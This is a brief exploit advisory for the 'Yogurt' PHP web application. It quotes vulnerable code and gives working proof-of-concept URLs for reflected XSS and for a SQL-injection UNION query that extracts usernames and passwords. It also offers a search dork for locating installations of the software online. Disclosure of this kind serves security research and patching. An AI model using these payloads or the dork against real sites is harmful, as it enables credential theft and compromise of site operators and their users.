Name : Yogurt
Site : http://sourceforge.net/projects/yogurt/
Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459
Dork : "Yogurt build"
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
Description:
Bug : XSS
In index.php:
index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL
BUG : SQL INJECTION
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
In neither case was the method _GET filtered properly.
Others .phps also contains the failures I'm posting the first one I found .. ^^
P0c:
XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script>
First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli.
SQLi :
http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--
OBS: need register_globals=on;
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum